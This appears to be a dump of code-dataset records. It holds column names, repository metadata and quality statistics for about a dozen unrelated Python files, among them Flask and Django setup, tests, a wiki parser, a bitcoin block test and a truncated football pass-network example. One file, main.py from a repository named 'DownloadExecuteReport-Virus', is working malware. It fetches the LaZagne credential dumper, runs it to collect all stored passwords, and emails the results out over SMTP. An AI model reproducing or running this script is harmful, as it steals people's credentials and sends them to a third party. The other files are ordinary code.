hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
4c219c1f42bd3a942209df9b52e42549c3b34e00
309
py
Python
space_trace/__init__.py
SpaceTeam/space-event-trace
ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f
[ "MIT" ]
2
2022-01-04T00:34:27.000Z
2022-01-04T00:51:14.000Z
space_trace/__init__.py
SpaceTeam/space-event-trace
ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f
[ "MIT" ]
null
null
null
space_trace/__init__.py
SpaceTeam/space-event-trace
ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f
[ "MIT" ]
null
null
null
import toml from flask import Flask from flask_sqlalchemy import SQLAlchemy app = Flask(__name__, instance_relative_config=True) app.config.from_file("config.toml", load=toml.load) db = SQLAlchemy(app) @app.before_first_request def create_table(): db.create_all() from space_trace import views, cli
18.176471
52
0.789644
46
309
5.021739
0.543478
0.077922
0
0
0
0
0
0
0
0
0
0
0.122977
309
16
53
19.3125
0.852399
0
0
0
0
0
0.035599
0
0
0
0
0
0
1
0.1
false
0
0.4
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
4c237eab0c099d5c3321cd95e513399431effe30
668
py
Python
TransitPass/urls.py
Savior-19/Savior19
b80c05a19ebadf73c3d88656b7c34b761cb02f3c
[ "MIT" ]
null
null
null
TransitPass/urls.py
Savior-19/Savior19
b80c05a19ebadf73c3d88656b7c34b761cb02f3c
[ "MIT" ]
null
null
null
TransitPass/urls.py
Savior-19/Savior19
b80c05a19ebadf73c3d88656b7c34b761cb02f3c
[ "MIT" ]
4
2020-05-27T10:02:31.000Z
2021-07-11T08:14:20.000Z
from django.urls import path from . import views urlpatterns = [ path('apply/', views.FillPassApplication, name='transit-pass-application-form'), path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'), path('view-application-list/', views.DisplayApplicationList, name='view-application-list'), path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'), path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'), path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'), ]
39.294118
117
0.754491
71
668
7.070423
0.408451
0.089641
0.039841
0.059761
0
0
0
0
0
0
0
0
0.08982
668
17
118
39.294118
0.825658
0
0
0
0
0
0.415546
0.31988
0
0
0
0
0
1
0
false
0.2
0.2
0
0.2
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
4c263e5689af5df6e8fbc9a6cee80e41efe505e2
2,319
py
Python
frontegg/baseConfig/identity_mixin.py
pinikeizman/python-sdk
f8b2188bdf160408adf0068f2e3bd3cd4b0b4655
[ "MIT" ]
null
null
null
frontegg/baseConfig/identity_mixin.py
pinikeizman/python-sdk
f8b2188bdf160408adf0068f2e3bd3cd4b0b4655
[ "MIT" ]
null
null
null
frontegg/baseConfig/identity_mixin.py
pinikeizman/python-sdk
f8b2188bdf160408adf0068f2e3bd3cd4b0b4655
[ "MIT" ]
null
null
null
from abc import ABCMeta, abstractmethod from frontegg.helpers.frontegg_urls import frontegg_urls import typing import jwt import requests from frontegg.helpers.logger import logger from jwt import InvalidTokenError class IdentityClientMixin(metaclass=ABCMeta): __publicKey = None @property @abstractmethod def vendor_session_request(self) -> requests.Session: pass @property @abstractmethod def should_refresh_vendor_token(self) -> bool: pass @abstractmethod def refresh_vendor_token(self) -> None: pass def get_public_key(self) -> str: if self.__publicKey: return self.__publicKey logger.info('could not find public key locally, will fetch public key') reties = 0 while reties < 10: try: self.__publicKey = self.fetch_public_key() return self.__publicKey except Exception as e: reties = reties + 1 logger.error( 'could not get public key from frontegg, retry number - ' + str(reties) + ', ' + str(e)) logger.error('failed to get public key in all retries') def fetch_public_key(self) -> str: if self.should_refresh_vendor_token: self.refresh_vendor_token() response = self.vendor_session_request.get( frontegg_urls.identity_service['vendor_config']) response.raise_for_status() data = response.json() return data.get('publicKey') def decode_jwt(self, authorization_header, verify: typing.Optional[bool] = True): if not authorization_header: raise InvalidTokenError('Authorization headers is missing') logger.debug('found authorization header: ' + str(authorization_header)) jwt_token = authorization_header.replace('Bearer ', '') if verify: public_key = self.get_public_key() logger.debug('got public key' + str(public_key)) decoded = jwt.decode(jwt_token, public_key, algorithms='RS256') else: decoded = jwt.decode(jwt_token, algorithms='RS256', verify=False) logger.info('jwt was decoded successfully') logger.debug('JWT value - ' + str(decoded)) return decoded
32.661972
108
0.639069
257
2,319
5.571984
0.354086
0.075419
0.050279
0.046089
0.103352
0.030726
0
0
0
0
0
0.005974
0.278137
2,319
70
109
33.128571
0.849462
0
0
0.175439
0
0
0.131522
0
0
0
0
0
0
1
0.105263
false
0.052632
0.122807
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
4c2897e16dece2ba4ecd2dbef042a4f90f011294
786
py
Python
main.py
TheRavehorn/DownloadExecuteReport-Virus
9df26706e504d1df33e07c09fa56baa28d89f435
[ "MIT" ]
null
null
null
main.py
TheRavehorn/DownloadExecuteReport-Virus
9df26706e504d1df33e07c09fa56baa28d89f435
[ "MIT" ]
null
null
null
main.py
TheRavehorn/DownloadExecuteReport-Virus
9df26706e504d1df33e07c09fa56baa28d89f435
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 import requests import subprocess import smtplib import re import os import tempfile def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name, "wb") as f: f.write(get_response.content) def send_mail(email, password, message): server = smtplib.SMTP_SSL("smtp.gmail.com", "465") server.ehlo() server.login(email, password) server.sendmail(email, email, message) server.quit() temp_dir = tempfile.gettempdir() os.chdir(temp_dir) download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe") # LaZagne result = subprocess.check_output("lazagne.exe all", shell=True) send_mail("[email protected]", "yourpassword", result) os.remove("lazagne.exe")
24.5625
97
0.720102
110
786
5.054545
0.581818
0.053957
0
0
0
0
0
0
0
0
0
0.011782
0.136132
786
31
98
25.354839
0.807069
0.036896
0
0
0
0.043478
0.2
0
0
0
0
0
0
1
0.086957
false
0.130435
0.26087
0
0.347826
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
4c31c440814ac777bd4779fa4968cf1b1847bcac
1,263
py
Python
integration/v2/test_service_instances.py
subhash12/cf-python-client
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
[ "Apache-2.0" ]
47
2017-12-17T00:54:33.000Z
2022-02-25T09:54:52.000Z
integration/v2/test_service_instances.py
subhash12/cf-python-client
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
[ "Apache-2.0" ]
125
2017-10-27T09:38:10.000Z
2022-03-10T07:53:35.000Z
integration/v2/test_service_instances.py
subhash12/cf-python-client
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
[ "Apache-2.0" ]
50
2018-01-19T07:57:21.000Z
2022-02-14T14:47:31.000Z
import logging import unittest from config_test import build_client_from_configuration _logger = logging.getLogger(__name__) class TestServiceInstances(unittest.TestCase): def test_create_update_delete(self): client = build_client_from_configuration() result = client.v2.service_instances.create(client.space_guid, "test_name", client.plan_guid, client.creation_parameters) if len(client.update_parameters) > 0: client.v2.service_instances.update(result["metadata"]["guid"], client.update_parameters) else: _logger.warning("update test skipped") client.v2.service_instances.remove(result["metadata"]["guid"]) def test_get(self): client = build_client_from_configuration() cpt = 0 for instance in client.v2.service_instances.list(): if cpt == 0: self.assertIsNotNone(client.v2.service_instances.get_first(space_guid=instance["entity"]["space_guid"])) self.assertIsNotNone(client.v2.service_instances.get(instance["metadata"]["guid"])) self.assertIsNotNone(client.v2.service_instances.list_permissions(instance["metadata"]["guid"])) cpt += 1 _logger.debug("test_get - %d found", cpt)
43.551724
129
0.69517
145
1,263
5.786207
0.351724
0.066746
0.125149
0.200238
0.299166
0.261025
0.170441
0
0
0
0
0.010784
0.192399
1,263
28
130
45.107143
0.811765
0
0
0.086957
0
0
0.087886
0
0
0
0
0
0.130435
1
0.086957
false
0
0.130435
0
0.26087
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
4c3723af9b53c7e19a14d4d5a300a57c775f6c8c
553
py
Python
setup.py
Lif3line/myo-helper
7c71a3ee693661ddba0171545bf5798f46231b3c
[ "MIT" ]
null
null
null
setup.py
Lif3line/myo-helper
7c71a3ee693661ddba0171545bf5798f46231b3c
[ "MIT" ]
null
null
null
setup.py
Lif3line/myo-helper
7c71a3ee693661ddba0171545bf5798f46231b3c
[ "MIT" ]
null
null
null
"""Utiltiy functions for working with Myo Armband data.""" from setuptools import setup, find_packages setup(name='myo_helper', version='0.1', description='Utiltiy functions for working with Myo Armband data', author='Lif3line', author_email='[email protected]', license='MIT', packages=find_packages(), url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo install_requires=[ 'scipy', 'sklearn', 'numpy' ], keywords='myo emg')
27.65
85
0.631103
64
553
5.359375
0.65625
0.093294
0.110787
0.151604
0.25656
0.25656
0.25656
0.25656
0
0
0
0.012019
0.24774
553
19
86
29.105263
0.8125
0.151899
0
0
0
0
0.345572
0.049676
0
0
0
0
0
1
0
true
0
0.066667
0
0.066667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
4c43be0918680e081f3bcc9acc58506e39754d60
1,421
py
Python
setup.py
jerzydziewierz/typobs
15fa697386f5fb3a1df53b865557c338be235d91
[ "Apache-2.0" ]
null
null
null
setup.py
jerzydziewierz/typobs
15fa697386f5fb3a1df53b865557c338be235d91
[ "Apache-2.0" ]
null
null
null
setup.py
jerzydziewierz/typobs
15fa697386f5fb3a1df53b865557c338be235d91
[ "Apache-2.0" ]
null
null
null
# setup.py as described in: # https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable # to install on your system, run: # > pip install -e . from setuptools import setup, find_packages setup( name='typobs', version='0.0.3', entry_points={ 'console_scripts': [ 'to_obsidian=to_obsidian:run', 'to_typora=to_typora:run', ] }, packages=find_packages(), # metadata to display on PyPI author="Jerzy Dziewierz", author_email="[email protected]", description="Convert between Typora and Obsidian link styles", keywords="Typora Obsidian Markdown link converter", url="https://github.com/jerzydziewierz/typobs", # project home page, if any project_urls={ "Bug Tracker": "https://github.com/jerzydziewierz/typobs", "Documentation": "https://github.com/jerzydziewierz/typobs", "Source Code": "https://github.com/jerzydziewierz/typobs", }, classifiers=[ "Programming Language :: Python", "Topic :: Documentation", "Topic :: Software Development :: Documentation", "Topic :: Office/Business", "Topic :: Text Processing :: Filters", "Topic :: Text Processing :: Markup", "Development Status :: 5 - Production/Stable", "Environment :: Console", "License :: OSI Approved :: Apache Software License", ] )
36.435897
87
0.640394
152
1,421
5.914474
0.625
0.048943
0.062291
0.124583
0.151279
0
0
0
0
0
0
0.010899
0.225194
1,421
39
88
36.435897
0.805631
0.152006
0
0
0
0
0.584654
0.060884
0
0
0
0
0
1
0
true
0
0.030303
0
0.030303
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
4c483ae5f1b2a18e4178f810a8a5efb2cf0ef940
776
py
Python
tests/test_selection.py
qrebjock/fanok
5c3b95ca5f2ec90af7060c21409a11130bd350bd
[ "MIT" ]
null
null
null
tests/test_selection.py
qrebjock/fanok
5c3b95ca5f2ec90af7060c21409a11130bd350bd
[ "MIT" ]
null
null
null
tests/test_selection.py
qrebjock/fanok
5c3b95ca5f2ec90af7060c21409a11130bd350bd
[ "MIT" ]
1
2020-08-26T12:20:26.000Z
2020-08-26T12:20:26.000Z
import pytest import numpy as np from fanok.selection import adaptive_significance_threshold @pytest.mark.parametrize( "w, q, offset, expected", [ ([1, 2, 3, 4, 5], 0.1, 0, 1), ([-1, 2, -3, 4, 5], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3], 0.1, 0, np.inf), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3), ( [-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38], 0.1, 0, 1.93, ), ], ) def test_adaptive_significance_threshold(w, q, offset, expected): w = np.array(w) threshold = adaptive_significance_threshold(w, q, offset=offset) assert threshold == expected
27.714286
79
0.474227
135
776
2.674074
0.325926
0.055402
0.041551
0.044321
0.368421
0.368421
0.163435
0.163435
0.127424
0.127424
0
0.192884
0.311856
776
27
80
28.740741
0.483146
0
0
0
0
0
0.028351
0
0
0
0
0
0.043478
1
0.043478
false
0
0.130435
0
0.173913
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
4c4be3eb705a80e6147920908a86da5673e90f59
918
py
Python
week4/string_format.py
MathAdventurer/Data_Mining
b0a06b5f7c13a3762a07eb84518aa4ee56896516
[ "MIT" ]
1
2021-02-27T18:35:39.000Z
2021-02-27T18:35:39.000Z
week4/string_format.py
MathAdventurer/Data_Mining
b0a06b5f7c13a3762a07eb84518aa4ee56896516
[ "MIT" ]
null
null
null
week4/string_format.py
MathAdventurer/Data_Mining
b0a06b5f7c13a3762a07eb84518aa4ee56896516
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Wed Feb 26 22:23:07 2020 @author: Neal LONG Try to construct URL with string.format """ base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}" stock = "000002" api_type = 'cp' print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type) print(base_url.format(stock,api_type)) print('='*40) stock = "00002" print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type) print(base_url.format(stock,api_type)) print('='*40) print('='*40) print('{:>6}'.format('236')) print('{:>06}'.format('236')) print("Every {} should know the use of {}-{} programming and {}" .format("programmer", "Open", "Source", "Operating Systems")) print("Every {3} should know the use of {2}-{1} programming and {0}" .format("programmer", "Open", "Source", "Operating Systems"))
27
80
0.623094
129
918
4.348837
0.457364
0.062389
0.085562
0.096257
0.606061
0.541889
0.392157
0.335116
0.335116
0.335116
0
0.070039
0.160131
918
34
81
27
0.657588
0.12963
0
0.529412
0
0
0.509881
0
0
0
0
0
0
1
0
false
0
0
0
0
0.647059
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
4c55251ed58f769e9fbe55114b14a016770952cb
1,075
py
Python
libcity/executor/map_matching_executor.py
nadiaaaaachen/Bigscity-LibCity
d8efd38fcc238e3ba518c559cc9f65b49efaaf71
[ "Apache-2.0" ]
1
2021-11-22T12:22:32.000Z
2021-11-22T12:22:32.000Z
libcity/executor/map_matching_executor.py
yuanhaitao/Bigscity-LibCity
9670c6a2f26043bb8d9cc1715780bb599cce2cd5
[ "Apache-2.0" ]
null
null
null
libcity/executor/map_matching_executor.py
yuanhaitao/Bigscity-LibCity
9670c6a2f26043bb8d9cc1715780bb599cce2cd5
[ "Apache-2.0" ]
null
null
null
from logging import getLogger from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor from libcity.utils import get_evaluator class MapMatchingExecutor(AbstractTraditionExecutor): def __init__(self, config, model): self.model = model self.config = config self.evaluator = get_evaluator(config) self.evaluate_res_dir = './libcity/cache/evaluate_cache' self._logger = getLogger() def evaluate(self, test_data): """ use model to test data Args: test_data """ result = self.model.run(test_data) batch = {'route': test_data['route'], 'result': result, 'rd_nwk': test_data['rd_nwk']} self.evaluator.collect(batch) self.evaluator.save_result(self.evaluate_res_dir) def train(self, train_dataloader, eval_dataloader): """ 对于传统模型,不需要训练 Args: train_dataloader(torch.Dataloader): Dataloader eval_dataloader(torch.Dataloader): Dataloader """ pass # do nothing
29.861111
94
0.652093
115
1,075
5.869565
0.4
0.071111
0.044444
0.053333
0
0
0
0
0
0
0
0
0.254884
1,075
35
95
30.714286
0.842697
0.163721
0
0
0
0
0.071429
0.036946
0
0
0
0
0
1
0.176471
false
0.058824
0.176471
0
0.411765
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
4c5b0cb42835f92d5cfa623b7b0648900462ba33
1,069
py
Python
examples/simpleWiki.py
klahnakoski/mo-parsing
885bf3fd61430d5fa15164168b975b18988fcf9e
[ "MIT" ]
1
2021-10-30T21:18:29.000Z
2021-10-30T21:18:29.000Z
examples/simpleWiki.py
klahnakoski/mo-parsing
885bf3fd61430d5fa15164168b975b18988fcf9e
[ "MIT" ]
22
2020-04-15T14:49:30.000Z
2021-12-22T02:49:52.000Z
examples/simpleWiki.py
klahnakoski/mo-parsing
885bf3fd61430d5fa15164168b975b18988fcf9e
[ "MIT" ]
null
null
null
from mo_parsing.helpers import QuotedString wikiInput = """ Here is a simple Wiki input: *This is in italics.* **This is in bold!** ***This is in bold italics!*** Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}} """ def convertToHTML(opening, closing): def conversionParseAction(t, l, s): return opening + t[0] + closing return conversionParseAction italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>")) bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>")) boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>")) def convertToHTML_A(t, l, s): try: text, url = t[0].split("->") except ValueError: raise ParseFatalException(s, l, "invalid URL link reference: " + t[0]) return '<A href="{}">{}</A>'.format(url, text) urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A) wikiMarkup = urlRef | boldItalicized | bolded | italicized
28.131579
91
0.635173
128
1,069
5.203125
0.476563
0.048048
0.084084
0.162162
0.178679
0.12012
0
0
0
0
0
0.00346
0.188962
1,069
37
92
28.891892
0.764706
0
0
0
0
0.043478
0.269193
0
0
0
0
0
0
1
0.130435
false
0
0.043478
0.043478
0.304348
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
4c5e8dbae6d19592874e45bede3206b69cd9c042
594
py
Python
genlicense.py
d53dave/python-crypto-licensecheck
d11612612ea54a5418fd8dbba9212a9c84c56f22
[ "CNRI-Python", "RSA-MD" ]
null
null
null
genlicense.py
d53dave/python-crypto-licensecheck
d11612612ea54a5418fd8dbba9212a9c84c56f22
[ "CNRI-Python", "RSA-MD" ]
null
null
null
genlicense.py
d53dave/python-crypto-licensecheck
d11612612ea54a5418fd8dbba9212a9c84c56f22
[ "CNRI-Python", "RSA-MD" ]
null
null
null
import sys from Crypto.Signature import pkcs1_15 from Crypto.Hash import SHA256 from Crypto.PublicKey import RSA def sign_data(key, data, output_file): with open(key, 'r', encoding='utf-8') as keyFile: rsakey = RSA.importKey(keyFile.read()) signer = pkcs1_15.new(rsakey) digest = SHA256.new(data.encode('utf-8')) with open(output_file, 'wb') as out: out.write(signer.sign(digest)) if __name__ == '__main__': key_file = sys.argv[1] input_string = sys.argv[2] out_file = sys.argv[3] sign_data(key_file, input_string, out_file)
28.285714
53
0.66835
89
594
4.235955
0.494382
0.079576
0.058355
0
0
0
0
0
0
0
0
0.03617
0.208754
594
20
54
29.7
0.765957
0
0
0
0
0
0.035354
0
0
0
0
0
0
1
0.0625
false
0
0.3125
0
0.375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
4c66a4345821de6dcbba5bb0bbb633c3ee79daa3
2,219
py
Python
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
simewu/bitcoin_researcher
b9fd2efdb8ae8467c5bd4b3320713a541635df16
[ "MIT" ]
1
2020-02-15T21:44:04.000Z
2020-02-15T21:44:04.000Z
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
SimeoW/bitcoin
3644405f06c8b16a437513e8c02f0f061b91be2e
[ "MIT" ]
null
null
null
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
SimeoW/bitcoin
3644405f06c8b16a437513e8c02f0f061b91be2e
[ "MIT" ]
null
null
null
# Copyright (C) 2015-2016 The bitcoin-blockchain-parser developers # # This file is part of bitcoin-blockchain-parser. # # It is subject to the license terms in the LICENSE file found in the top-level # directory of this distribution. # # No part of bitcoin-blockchain-parser, including this file, may be copied, # modified, propagated, or distributed except according to the terms contained # in the LICENSE file. import unittest from datetime import datetime from .utils import read_test_data from blockchain_parser.block import Block class TestBlock(unittest.TestCase): def test_from_hex(self): block_hex = read_test_data("genesis_block.txt") block = Block.from_hex(block_hex) self.assertEqual(1, block.n_transactions) block_hash = "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1" \ "b60a8ce26f" self.assertEqual(block_hash, block.hash) self.assertEqual(486604799, block.header.bits) merkle_root = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \ "b7afdeda33b" self.assertEqual(merkle_root, block.header.merkle_root) self.assertEqual(2083236893, block.header.nonce) self.assertEqual(1, block.header.version) self.assertEqual(1, block.header.difficulty) self.assertEqual(285, block.size) self.assertEqual(datetime.utcfromtimestamp(1231006505), block.header.timestamp) self.assertEqual("0" * 64, block.header.previous_block_hash) for tx in block.transactions: self.assertEqual(1, tx.version) tx_hash = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \ "b7afdeda33b" self.assertEqual(tx_hash, tx.hash) self.assertEqual(204, tx.size) self.assertEqual(0, tx.locktime) self.assertEqual(0xffffffff, tx.inputs[0].transaction_index) self.assertEqual(0xffffffff, tx.inputs[0].sequence_number) self.assertTrue("ffff001d" in tx.inputs[0].script.value) self.assertEqual("0" * 64, tx.inputs[0].transaction_hash) self.assertEqual(50 * 100000000, tx.outputs[0].value)
43.509804
79
0.68995
250
2,219
6.028
0.388
0.179164
0.042468
0.041805
0.119443
0.045123
0
0
0
0
0
0.111175
0.221722
2,219
50
80
44.38
0.761436
0.177557
0
0.057143
0
0
0.120728
0.088203
0
0
0.011025
0
0.542857
1
0.028571
false
0
0.114286
0
0.171429
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
1
4c6c5b767e3d2e7d380bed49701614a213de873b
8,063
py
Python
examples/plots/plot_pass_network.py
DymondFormation/mplsoccer
544300857ec5936781e12fda203cf2df8a3d00b9
[ "MIT" ]
null
null
null
examples/plots/plot_pass_network.py
DymondFormation/mplsoccer
544300857ec5936781e12fda203cf2df8a3d00b9
[ "MIT" ]
null
null
null
examples/plots/plot_pass_network.py
DymondFormation/mplsoccer
544300857ec5936781e12fda203cf2df8a3d00b9
[ "MIT" ]
null
null
null
""" ============ Pass Network ============ This example shows how to plot passes between players in a set formation. """ import pandas as pd from mplsoccer.pitch import Pitch from matplotlib.colors import to_rgba import numpy as np from mplsoccer.statsbomb import read_event, EVENT_SLUG ############################################################################## # Set team and match info, and get event and tactics dataframes for the defined match_id match_id = 15946 team = 'Barcelona' opponent = 'Alavés (A), 2018/19 La Liga' event_dict = read_event(f'{EVENT_SLUG}/{match_id}.json', warn=False) players = event_dict['tactics_lineup'] events = event_dict['event'] ############################################################################## # Adding on the last tactics id and formation for the team for each event events.loc[events.tactics_formation.notnull(), 'tactics_id'] = events.loc[ events.tactics_formation.notnull(), 'id'] events[['tactics_id', 'tactics_formation']] = events.groupby('team_name')[[ 'tactics_id', 'tactics_formation']].ffill() ############################################################################## # Add the abbreviated player position to the players dataframe formation_dict = {1: 'GK', 2: 'RB', 3: 'RCB', 4: 'CB', 5: 'LCB', 6: 'LB', 7: 'RWB', 8: 'LWB', 9: 'RDM', 10: 'CDM', 11: 'LDM', 12: 'RM', 13: 'RCM', 14: 'CM', 15: 'LCM', 16: 'LM', 17: 'RW', 18: 'RAM', 19: 'CAM', 20: 'LAM', 21: 'LW', 22: 'RCF', 23: 'ST', 24: 'LCF', 25: 'SS'} players['position_abbreviation'] = players.player_position_id.map(formation_dict) ############################################################################## # Add on the subsitutions to the players dataframe, i.e. where players are subbed on # but the formation doesn't change sub = events.loc[events.type_name == 'Substitution', ['tactics_id', 'player_id', 'substitution_replacement_id', 'substitution_replacement_name']] players_sub = players.merge(sub.rename({'tactics_id': 'id'}, axis='columns'), on=['id', 'player_id'], how='inner', validate='1:1') players_sub = (players_sub[['id', 'substitution_replacement_id', 'position_abbreviation']] .rename({'substitution_replacement_id': 'player_id'}, axis='columns')) players = pd.concat([players, players_sub]) 